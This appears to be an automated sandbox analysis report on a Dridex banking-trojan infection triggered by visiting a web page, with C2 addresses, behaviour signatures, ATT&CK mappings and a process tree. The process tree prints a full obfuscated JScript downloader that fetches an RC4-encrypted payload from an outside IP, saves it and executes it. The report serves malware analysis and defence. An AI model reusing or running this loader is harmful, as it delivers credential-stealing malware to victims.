Analysis

  • max time kernel: 148s
  • max time network: 155s
  • platform: windows10_x64
  • resource: win10-ja-20210920
  • submitted: 30-09-2021 23:52

General

  • Target: http://hillmag.xyz/
  • Sample: 210930-3w5mjaafdj

Malware Config

Extracted

  • Family: dridex
  • Botnet: 10111
  • C2:
    185.168.130.138:443
    79.172.255.198:9676
    195.154.108.109:10172
  • rc4.plain

Signatures

  • Dridex

    Dridex (known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Registers COM server for autorun 1 TTPs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
  • Modifies registry class 44 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://hillmag.xyz/
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3188
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3188 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3076
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://45.138.27.98/?NDIwMTQx&OjmSVUSL&fhfghddfsdf=shuffle&cxssdvxcv=107hone.88pp109.406p7d2s0&sdfsdfdfg=diet&ogfgafgn4=wHzQMvXcJwDMFYPJKeXD&dsfdffg43t=T6NbP0fOH0SD2MjN2LHQRcHsLlni0OrBDV2rtl7yQluC_KAsJOBWNVbljk3VKQRlmIwLAVoTpfiv3EDczEeYgcSH9SWOYwl1otKWJA&YJOAtRMDIMjE0MTc=" "2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4284
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://45.138.27.98/?NDIwMTQx&OjmSVUSL&fhfghddfsdf=shuffle&cxssdvxcv=107hone.88pp109.406p7d2s0&sdfsdfdfg=diet&ogfgafgn4=wHzQMvXcJwDMFYPJKeXD&dsfdffg43t=T6NbP0fOH0SD2MjN2LHQRcHsLlni0OrBDV2rtl7yQluC_KAsJOBWNVbljk3VKQRlmIwLAVoTpfiv3EDczEeYgcSH9SWOYwl1otKWJA&YJOAtRMDIMjE0MTc=" "2"
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:4248
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c 9wjrz.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1344
            • C:\Users\Admin\AppData\Local\Temp\9wjrz.exe
              9wjrz.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:1580
  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.170.0822.0002\FileSyncConfig.exe
    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.170.0822.0002\FileSyncConfig.exe"
    1⤵
    • Modifies registry class
    PID:4656

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Persistence: Registry Run Keys / Startup Folder, T1060 (1)
  • Defense Evasion: Modify Registry, T1112 (1)
  • Discovery: Query Registry, T1012 (1)
  • Discovery: System Information Discovery, T1082 (2)

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\LYO6N8FE.cookie
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\OH1JPHSC.cookie
  • C:\Users\Admin\AppData\Local\Temp\3.tMp
  • C:\Users\Admin\AppData\Local\Temp\9wjrz.exe
  • memory/1344-120-0x0000000000000000-mapping.dmp
  • memory/1580-124-0x0000000002000000-0x000000000203C000-memory.dmp (Filesize 240KB)
  • memory/1580-125-0x0000000000400000-0x00000000004F9000-memory.dmp (Filesize 996KB)
  • memory/1580-121-0x0000000000000000-mapping.dmp
  • memory/3076-116-0x0000000000000000-mapping.dmp
  • memory/3188-115-0x00007FF90FBB0000-0x00007FF90FC1B000-memory.dmp (Filesize 428KB)
  • memory/4248-118-0x0000000000000000-mapping.dmp
  • memory/4284-117-0x0000000000000000-mapping.dmp